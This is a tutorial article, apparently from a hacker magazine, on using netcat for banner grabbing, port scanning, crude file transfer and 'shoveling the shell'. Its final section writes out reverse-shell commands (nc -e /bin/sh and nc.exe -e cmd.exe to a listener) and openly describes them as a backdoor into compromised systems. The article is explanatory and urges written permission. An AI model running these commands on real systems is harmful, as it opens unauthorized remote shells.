More Fun with Netcat

by DJ Williams

The following article is a continuation to MobiusRenoire's original submission in 21:2 "Fun With Netcat."  Netcat (nc), created by Hobbit, is known as the "Swiss army knife" of security/hacking tools.  This is most likely due to the tool's extensive features and capabilities.  Before we explore some additional uses of Netcat, you are advised to get written permission before executing any of these examples on systems you do not own.  Sure, you may be saying "screw that" yet even on work systems, employees have been fired for running tools without permission.

As described in the 21:2 article, Netcat used with basic options.

$ nc [host] [port]

Allows TCP/UDP (-u) connections on a selected port to perform a variety of tasks.  The focus of this article is to explore additional uses, so let's take a look at some more examples.

Web Server (Banner) Discovery

Most web servers are configured by default to reveal the type and version, which may be helpful to an attacker.  Wait...  I know some of you are saying I changed my banners to obfuscate the web server (i.e., RemoveServerHeader feature in the URLScan security tool to mask IIS web servers).  The point here is that someone could have changed the banner and you may want to validate the output with an alternate tool such as net-square's HTTPrint (www.net-square.com/httprint).  With that said, let's look how web server discovery can be accomplished.  First we need to establish a connection to the target web server on the default HTTP port.

$ nc -vv target 80

The -vv option indicates that Netcat is running in very verbose mode, followed by the target, which can be a domain or IP, and the default web server port (80).  Once Netcat connects, you must type in an HTTP directive such as:

HEAD / HTTP/1.0 <Enter> <Enter>

The reply should indicate what type of web server is running.  You can substitute the HEAD directive for the OPTIONS directive to learn more about the web server.  An example of the output is listed below:

$ nc -vv 10.10.10.1 80 www.example.com [10.10.10.1) 80 (http) open HEAD / HTTP/1.0 HTTP/1.1 302 Found Date: Sun, 22 Aug 2004 18:09:21 GMT Server: Stronghold/2.4.2 Apache/1.3.6 C2NetEU/2412 (Unix) mod_fastcgi/2.2.12 Location: http://www.example.com/index.html Connection: close Content-Type: text/html; charset=iso-8859-1

Port Scanning

As a fast alternative to Fydor's Nmap (www.insecure.org/nmap), the king of port scanners, Netcat can be used.  Is this the best choice?  I am sure it is not, yet the purpose of this article is to demonstrate Netcat's abilities.  Let's take a look at the syntax to use Netcat as a port scanner.

$ nc -v -r -w3 -z target port1-portN

The -v option indicates that Netcat is running in verbose mode, the -r is to randomly select ports from a provided list, the -w is the wait time in seconds, and the -z option prevents sending data to the TCP connection.  The target can be a domain or IP and the port list follows (use a space to separate).  An example of a TCP port scan (on a UNIX server) is listed below:

Note:  For UDP, add the -u option and associated ports.

$ nc -v -z -r -w3 10.96.0.242 20-21 23 80-445 | sort -k 3b www.example.com [10.96.0.242] 21 open www.example.com [10.96.0.242] 23 open www.example.com [10.96.0.242] 80 open www.example.com [10.96.0.242] 443 open

FTP

Yes, you read it right.  Netcat can be used as a crude FTP tool.  First you will need Netcat installed on both machines.  I tested both a binary and text transfer.  They both worked fine.

Note:  For best results, make sure the sender has a small delay (-w).  The receiver does not require a delay.  Go ahead and try it out!  An example of the output is listed below:

Sender

$ nc -w3 host port < file

The -w wait time in seconds; host/IP of receiver; < redirect file in.

$ nc -w3 127.0.0.1 2112 < help.txt $ nc -w3 127.0.0.1 2112 < Sample.jpg

Receiver

$ nc -l -p port > file

The -l listen mode for incoming connections; -p port number; > redirect output to file.

$ nc -l -p 2112 > help.txt $ nc -l -p 2112 > Sample.jpg

Shovel the Shell

To wrap up, I have included the most interesting use of Netcat, in my humble opinion.  Here we will be using Netcat to shovel the shell (command prompt) from one machine to another.  This has been used and most likely is in use right now, where one can acquire a backdoor into a compromised system.  Two examples are listed below.

Target Machine

$ nc -e path-to-program [host] [port]

The -e is the program to execute once a connection is established.

The following is an UNIX style:

$ nc -e /bin/sh 10.10.10.69 2112

The following is a Windows style:

C:\> nc.exe -e cmd.exe 10.10.10.69 2112

Attack Machine

$ nc -vv -l -p port

The -vv option indicates that Netcat is running in very verbose mode; -l listen mode for incoming connections; -p port number.

Start a listener, pick a port allowed through the firewall:

$ nc -vv -l -p 2112 listening on [any] 2112 ... connect to [10.10.10.69] from www.example.com [10.10.10.69] 548 Microsoft Windows 2000 [version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\inetpub\scripts>

Note, you may need to hit Enter a few times... and bang, you have a shell prompt on the remote system.

Final Words

In closing, we have seen the power of the Netcat tool.  You are encouraged to test its abilities on your local system (127.0.0.1) as it will work.

For more information, check out the following links:

1. www.zoran.net/wm_resources/netcat_hobbit.asp  (used as a reference)
2. www.securityfocus.com/tools/137  (download site)
3. Netcat 1.1 for Win95/NT is Released

Shout Outs: RH, OM, JM, KW, SW, and PF (the band).